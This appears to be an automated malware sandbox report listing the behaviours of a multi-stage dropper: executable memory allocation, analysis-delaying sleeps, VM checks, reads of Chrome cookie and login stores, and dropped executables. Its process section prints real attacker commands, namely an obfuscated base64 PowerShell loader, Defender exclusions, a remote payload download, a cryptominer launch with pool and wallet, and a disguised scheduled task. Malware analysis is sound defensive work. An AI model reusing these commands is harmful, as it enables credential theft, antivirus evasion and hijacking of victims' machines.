NtProtectVirtualMemory April 21, 2025, 9:58 a.m.	process_identifier: 2144 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x75291000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 21, 2025, 9:52 a.m.	process_identifier: 1236 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000006850000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 21, 2025, 9:59 a.m.	process_identifier: 2320 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7793f000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 21, 2025, 9:59 a.m.	process_identifier: 2320 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x778b0000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 21, 2025, 9:59 a.m.	process_identifier: 2320 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 180224 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00f41000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 21, 2025, 9:59 a.m.	process_identifier: 2320 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04630000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 21, 2025, 9:59 a.m.	process_identifier: 2320 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04640000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 21, 2025, 9:59 a.m.	process_identifier: 2320 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04650000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 21, 2025, 9:59 a.m.	process_identifier: 2320 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04660000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 21, 2025, 9:59 a.m.	process_identifier: 2320 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04670000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 21, 2025, 9:59 a.m.	process_identifier: 2320 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04680000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 21, 2025, 9:59 a.m.	process_identifier: 2320 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04670000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 21, 2025, 9:59 a.m.	process_identifier: 2320 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04670000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 21, 2025, 9:59 a.m.	process_identifier: 2320 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04670000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 21, 2025, 9:59 a.m.	process_identifier: 2320 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04670000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 21, 2025, 9:59 a.m.	process_identifier: 2320 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04670000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 21, 2025, 9:59 a.m.	process_identifier: 2320 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04690000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory April 21, 2025, 9:59 a.m.	process_identifier: 2980 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00440000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 21, 2025, 9:59 a.m.	process_identifier: 2980 region_size: 401408 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x022e0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffff	1
NtProtectVirtualMemory April 21, 2025, 9:59 a.m.	process_identifier: 2260 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7793f000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 21, 2025, 9:59 a.m.	process_identifier: 2260 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x778b0000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 21, 2025, 9:59 a.m.	process_identifier: 2260 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x75ab1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 21, 2025, 9:59 a.m.	process_identifier: 2260 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73211000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 21, 2025, 9:59 a.m.	process_identifier: 2260 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 413696 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00401000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 21, 2025, 9:59 a.m.	process_identifier: 2260 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04cf0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 21, 2025, 9:59 a.m.	process_identifier: 2260 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04d00000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 21, 2025, 9:59 a.m.	process_identifier: 2260 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04d10000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 21, 2025, 9:59 a.m.	process_identifier: 2260 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04d50000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 21, 2025, 9:59 a.m.	process_identifier: 2260 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04d80000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 21, 2025, 9:59 a.m.	process_identifier: 2260 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04d80000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 21, 2025, 9:59 a.m.	process_identifier: 2260 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04d80000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 21, 2025, 9:59 a.m.	process_identifier: 2260 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04d90000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 21, 2025, 9:59 a.m.	process_identifier: 2260 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04da0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 21, 2025, 9:59 a.m.	process_identifier: 2260 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04db0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 21, 2025, 9:59 a.m.	process_identifier: 2260 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04dc0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 21, 2025, 9:59 a.m.	process_identifier: 2260 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04dd0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 21, 2025, 9:59 a.m.	process_identifier: 2260 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04de0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 21, 2025, 9:59 a.m.	process_identifier: 2260 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04df0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 21, 2025, 9:59 a.m.	process_identifier: 2260 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04e00000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 21, 2025, 9:59 a.m.	process_identifier: 2260 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04e10000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 21, 2025, 9:59 a.m.	process_identifier: 2260 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04e20000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 21, 2025, 9:59 a.m.	process_identifier: 2260 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04e30000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 21, 2025, 9:59 a.m.	process_identifier: 2260 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04d80000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

A process attempted to delay the analysis task. (2 events)

description	94cd32df1e.exe tried to sleep 627 seconds, actually delayed analysis time by 627 seconds
description	namez.exe tried to sleep 148 seconds, actually delayed analysis time by 148 seconds

Queries the disk size which could be used to detect virtual machine with small fixed size or dynamic allocation (6 events)

Time & API	Arguments	Status	Return
GetDiskFreeSpaceW April 21, 2025, 9:58 a.m.	number_of_free_clusters: 2424914 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: \ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW April 21, 2025, 9:58 a.m.	number_of_free_clusters: 2424914 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: \ total_number_of_clusters: 8362495	1	1
DeviceIoControl April 21, 2025, 9:59 a.m.	input_buffer: control_code: 475228 (IOCTL_DISK_GET_LENGTH_INFO) device_handle: 0x000001f0 output_buffer:	1	1
DeviceIoControl April 21, 2025, 9:59 a.m.	input_buffer: control_code: 475228 (IOCTL_DISK_GET_LENGTH_INFO) device_handle: 0x000001f0 output_buffer:	1	1
DeviceIoControl April 21, 2025, 9:59 a.m.	input_buffer: control_code: 475228 (IOCTL_DISK_GET_LENGTH_INFO) device_handle: 0x000001f0 output_buffer:	1	1
DeviceIoControl April 21, 2025, 9:59 a.m.	input_buffer: control_code: 475228 (IOCTL_DISK_GET_LENGTH_INFO) device_handle: 0x000001f0 output_buffer:	1	1

Steals private information from local Internet browsers (7 events)

file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Web Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\lockfile
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Login Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local State

Creates executable files on the filesystem (31 events)

file	C:\Users\test22\AppData\Local\Temp\IXP000.TMP\2m8357.exe
file	C:\Users\test22\AppData\Local\Temp\IXP000.TMP\1o76j7.exe
file	C:\Users\test22\AppData\Local\Temp\10000260101\de854920e3.exe
file	C:\Users\test22\AppData\Local\Temp\10073290101\hvof1h0.exe
file	C:\Users\test22\AppData\Local\Temp\10049091121\690BRuM.cmd
file	C:\Users\test22\AppData\Local\Temp\10074671121\690BRuM.cmd
file	C:\Windows\Temp\{C114507B-F32B-4B28-B4B2-1318F2E1E559}\.cr\hvof1h0.exe
file	C:\Windows\Temp\{DD44DF47-B1D2-4CCE-B7A7-2E9D94F17EDB}\.ba\CC3260MT.dll
file	C:\Windows\Temp\{DD44DF47-B1D2-4CCE-B7A7-2E9D94F17EDB}\.ba\Entropy.dll
file	C:\Windows\Temp\{DD44DF47-B1D2-4CCE-B7A7-2E9D94F17EDB}\.ba\BorlndMm.dll
file	C:\Users\test22\AppData\Local\Temp\10013260101\xztOH3r.exe
file	C:\Users\test22\AppData\Local\Temp\10068930101\pOqYWAZ.exe
file	C:\Users\test22\AppData\Local\Temp\10074640101\lBiQciH.exe
file	C:\Windows\Temp\{DD44DF47-B1D2-4CCE-B7A7-2E9D94F17EDB}\.ba\Install.dll
file	C:\Users\test22\AppData\Local\Temp\10064520101\lBiQciH.exe
file	C:\Users\test22\AppData\Local\Temp\SystemService\sysdrv.exe
file	C:\Users\test22\AppData\Local\Temp\10001030101\LAc2heq.exe
file	C:\Users\test22\AppData\Local\Temp\10036890101\94cd32df1e.exe
file	C:\Windows\Temp\{DD44DF47-B1D2-4CCE-B7A7-2E9D94F17EDB}\.ba\wspconfig.dll
file	C:\Users\test22\AppData\Local\Temp\SystemService\miner_loop.bat
file	C:\Windows\Temp\{DD44DF47-B1D2-4CCE-B7A7-2E9D94F17EDB}\.ba\StlpMt45.dll
file	C:\Users\test22\AppData\Local\Temp\10074650101\235T1TS.exe
file	C:\Users\test22\AppData\Local\Temp\10037070101\i5Kz53x.exe
file	C:\Users\test22\AppData\Local\Temp\10072280101\eZp5zCz.exe
file	C:\Windows\Temp\{DD44DF47-B1D2-4CCE-B7A7-2E9D94F17EDB}\.ba\MindClient.dll
file	C:\Windows\Temp\{DD44DF47-B1D2-4CCE-B7A7-2E9D94F17EDB}\.ba\Portal-Ech64.exe
file	C:\Users\test22\AppData\Local\Temp\10001850101\Hmcm0Oj.exe
file	C:\Users\test22\AppData\Local\Temp\SystemService\crypted.exe
file	C:\Users\test22\AppData\Local\Temp\10074660101\i5Kz53x.exe
file	C:\Users\test22\AppData\Local\Temp\10004650101\235T1TS.exe
file	C:\Users\test22\AppData\Local\Temp\SystemService\install.bat

Creates a shortcut to an executable file (4 events)

file	C:\Users\test22\AppData\Local\Temp\IXP000.TMP\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
file	C:\Users\test22\AppData\Local\Temp\SystemService\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Command Prompt.lnk
file	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell (x86).lnk

Creates a suspicious process (12 events)

cmdline	PoWERsheLL -w H -C "Iex([SySTeM.TEXT.eNCoDiNg]::UTf8.getStrIng([SYsTEm.convERt]::FroMBASE64stRINg(($iLrRl=[SYStEM.Io.fILe]::REAdALlteXt('C:\Users\test22\AppData\Local\Temp\10049091121\690BRuM.cmd')).substrInG($iLrRl.lENgtH - 3155928))))"
cmdline	powershell -WindowStyle Hidden -Command "Start-Process -WindowStyle Hidden -FilePath 'C:\Users\test22\AppData\Local\Temp\SystemService\sysdrv.exe' -ArgumentList '--url pool.hashvault.pro:443 --user 82tLCbM64D89VX5zsHwjYpCu4WftAMF9AHzc5sd2ZLmHZBUZdwX6UJzEY1w4bwK5PhV4Tsh7kNUGXS8CynaTsvkADvcbvP6.TEST22-PC --pass x --donate-level 1 --tls --cpu-max-threads-hint=25'"
cmdline	"C:\Windows\System32\cmd.exe" /C "C:\Users\test22\AppData\Local\Temp\10049091121\690BRuM.cmd"
cmdline	C:\Windows\system32\cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\test22\AppData\Local\hjvegayfkdgz', 'C:\Users', 'C:\ProgramData'"
cmdline	C:\Windows\system32\cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\test22\AppData\Local\pptvscyct', 'C:\Users', 'C:\ProgramData'"
cmdline	Cmd.ExE /c StARt /mIn PoWERsheLL -w H -C "Iex([SySTeM.TEXT.eNCoDiNg]::UTf8.getStrIng([SYsTEm.convERt]::FroMBASE64stRINg(($iLrRl=[SYStEM.Io.fILe]::REAdALlteXt('C:\Users\test22\AppData\Local\Temp\10049091121\690BRuM.cmd')).substrInG($iLrRl.lENgtH - 3155928))))"
cmdline	powershell -Command "Invoke-WebRequest -Uri 'https://github.com/coolnifas/frick/raw/refs/heads/main/mineratowerst.exe' -OutFile 'C:\Users\test22\AppData\Local\pptvscyct\erfwnvwyrxrr.exe'"
cmdline	powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\test22\AppData\Local\hjvegayfkdgz', 'C:\Users', 'C:\ProgramData'"
cmdline	powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\test22\AppData\Local\pptvscyct', 'C:\Users', 'C:\ProgramData'"
cmdline	C:\Windows\system32\cmd.exe /c powershell -Command "Invoke-WebRequest -Uri 'https://github.com/coolnifas/frick/raw/refs/heads/main/mineratowerst.exe' -OutFile 'C:\Users\test22\AppData\Local\pptvscyct\erfwnvwyrxrr.exe'"
cmdline	C:\Windows\system32\cmd.exe /K C:\Users\test22\AppData\Local\Temp\SystemService\miner_loop.bat
cmdline	schtasks /Create /F /SC ONLOGON /RL HIGHEST /TN "MicrosoftEdgeUpdate" /TR "\"C:\Users\test22\AppData\Roaming\SystemService\miner_loop.bat\"" /RU "test22"

Drops a binary and executes it (16 events)

file	C:\Users\test22\AppData\Local\Temp\f1e82329e5\namez.exe
file	C:\Users\test22\AppData\Local\Temp\10000260101\de854920e3.exe
file	C:\Users\test22\AppData\Local\Temp\10001030101\LAc2heq.exe
file	C:\Users\test22\AppData\Local\Temp\10001850101\Hmcm0Oj.exe
file	C:\Users\test22\AppData\Local\Temp\10004650101\235T1TS.exe
file	C:\Users\test22\AppData\Local\Temp\10013260101\xztOH3r.exe
file	C:\Users\test22\AppData\Local\Temp\10036890101\94cd32df1e.exe
file	C:\Users\test22\AppData\Local\Temp\10049091121\690BRuM.cmd
file	C:\Users\test22\AppData\Local\Temp\10064520101\lBiQciH.exe
file	C:\Users\test22\AppData\Local\Temp\10068930101\pOqYWAZ.exe
file	C:\Users\test22\AppData\Local\Temp\10072280101\eZp5zCz.exe
file	C:\Users\test22\AppData\Local\Temp\10073290101\hvof1h0.exe
file	C:\Users\test22\AppData\Local\Temp\10074660101\i5Kz53x.exe
file	C:\Users\test22\AppData\Local\Temp\SystemService\install.bat
file	C:\Users\test22\AppData\Local\Temp\SystemService\crypted.exe
file	C:\Windows\Temp\{C114507B-F32B-4B28-B4B2-1318F2E1E559}\.cr\hvof1h0.exe

Drops an executable to the user AppData folder (6 events)

file	C:\Users\test22\AppData\Local\Temp\10004650101\235T1TS.exe
file	C:\Users\test22\AppData\Local\Temp\SystemService\crypted.exe
file	C:\Users\test22\AppData\Local\Temp\10036890101\94cd32df1e.exe
file	C:\Users\test22\AppData\Local\Temp\10073290101\hvof1h0.exe
file	C:\Users\test22\AppData\Local\Temp\f1e82329e5\namez.exe
file	C:\Users\test22\AppData\Local\Temp\10001850101\Hmcm0Oj.exe

Executes one or more WMI queries (3 events)

wmi	SELECT * FROM Win32_Process
wmi	SELECT * FROM Win32_Process Where SessionId='1'
wmi	SELECT * FROM Win32_DiskDrive

A process created a hidden window (17 events)

Time & API	Arguments	Status	Return
ShellExecuteExW April 21, 2025, 9:58 a.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\f1e82329e5\namez.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\f1e82329e5\namez.exe	1	1
ShellExecuteExW April 21, 2025, 9:59 a.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\10000260101\de854920e3.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\10000260101\de854920e3.exe	1	1
ShellExecuteExW April 21, 2025, 9:59 a.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\10001030101\LAc2heq.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\10001030101\LAc2heq.exe	1	1
ShellExecuteExW April 21, 2025, 9:59 a.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\10001850101\Hmcm0Oj.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\10001850101\Hmcm0Oj.exe	1	1
ShellExecuteExW April 21, 2025, 9:59 a.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\10004650101\235T1TS.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\10004650101\235T1TS.exe	1	1
ShellExecuteExW April 21, 2025, 9:59 a.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\10013260101\xztOH3r.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\10013260101\xztOH3r.exe	1	1
ShellExecuteExW April 21, 2025, 9:59 a.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\10036890101\94cd32df1e.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\10036890101\94cd32df1e.exe	1	1
ShellExecuteExW April 21, 2025, 9:59 a.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\10037070101\i5Kz53x.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\10037070101\i5Kz53x.exe	1	1
ShellExecuteExW April 21, 2025, 10 a.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\10049091121\690BRuM.cmd parameters: filepath: C:\Users\test22\AppData\Local\Temp\10049091121\690BRuM.cmd	1	1
ShellExecuteExW April 21, 2025, 10 a.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\10064520101\lBiQciH.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\10064520101\lBiQciH.exe	1	1
ShellExecuteExW April 21, 2025, 10 a.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\10068930101\pOqYWAZ.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\10068930101\pOqYWAZ.exe	1	1
ShellExecuteExW April 21, 2025, 10 a.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\10072280101\eZp5zCz.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\10072280101\eZp5zCz.exe	1	1
ShellExecuteExW April 21, 2025, 10 a.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\10073290101\hvof1h0.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\10073290101\hvof1h0.exe	1	1
ShellExecuteExW April 21, 2025, 10 a.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\10074640101\lBiQciH.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\10074640101\lBiQciH.exe	1	1
ShellExecuteExW April 21, 2025, 10 a.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\10074650101\235T1TS.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\10074650101\235T1TS.exe	1	1
ShellExecuteExW April 21, 2025, 10 a.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\10074660101\i5Kz53x.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\10074660101\i5Kz53x.exe	1	1
CreateProcessInternalW April 21, 2025, 9:53 a.m.	thread_identifier: 1968 thread_handle: 0x000000000000006c process_identifier: 1168 current_directory: C:\Users\test22\AppData\Local\Temp\SystemService filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe track: 1 command_line: powershell -WindowStyle Hidden -Command "Start-Process -WindowStyle Hidden -FilePath 'C:\Users\test22\AppData\Local\Temp\SystemService\sysdrv.exe' -ArgumentList '--url pool.hashvault.pro:443 --user 82tLCbM64D89VX5zsHwjYpCu4WftAMF9AHzc5sd2ZLmHZBUZdwX6UJzEY1w4bwK5PhV4Tsh7kNUGXS8CynaTsvkADvcbvP6.TEST22-PC --pass x --donate-level 1 --tls --cpu-max-threads-hint=25'" filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x0000000000000068	1	1

Searches running processes potentially to identify processes for sandbox evasion, code injection or memory dumping (11 events)

Time & API	Arguments	Status	Return
Process32NextW April 21, 2025, 9:59 a.m.	snapshot_handle: 0x00000118 process_name: taskhost.exe process_identifier: 2040	1	1
Process32NextW April 21, 2025, 9:59 a.m.	snapshot_handle: 0x00000118 process_name: SearchProtocolHost.exe process_identifier: 1492	1	1
Process32NextW April 21, 2025, 9:59 a.m.	snapshot_handle: 0x00000118 process_name: namez.exe process_identifier: 2276	1	1
Process32NextW April 21, 2025, 9:59 a.m.	snapshot_handle: 0x00000118 process_name: svchost.exe process_identifier: 2624	1	1
Process32NextW April 21, 2025, 9:59 a.m.	snapshot_handle: 0x00000118 process_name: mscorsvw.exe process_identifier: 2652	1	1
Process32NextW April 21, 2025, 9:59 a.m.	snapshot_handle: 0x00000118 process_name: sppsvc.exe process_identifier: 2744	1	1
Process32NextW April 21, 2025, 9:59 a.m.	snapshot_handle: 0x00000118 process_name: svchost.exe process_identifier: 2860	1	1
Process32NextW April 21, 2025, 9:59 a.m.	snapshot_handle: 0x00000118 process_name: Hmcm0Oj.exe process_identifier: 2980	1	1
Process32NextW April 21, 2025, 9:59 a.m.	snapshot_handle: 0x00000118 process_name: cmd.exe process_identifier: 3024	1	1
Process32NextW April 21, 2025, 9:59 a.m.	snapshot_handle: 0x00000118 process_name: conhost.exe process_identifier: 3032	1	1
Process32NextW April 21, 2025, 9:59 a.m.	snapshot_handle: 0x00000118 process_name: pw.exe process_identifier: 3056	1	1

An executable file was downloaded by the process namez.exe (14 events)

Time & API	Arguments	Status	Return
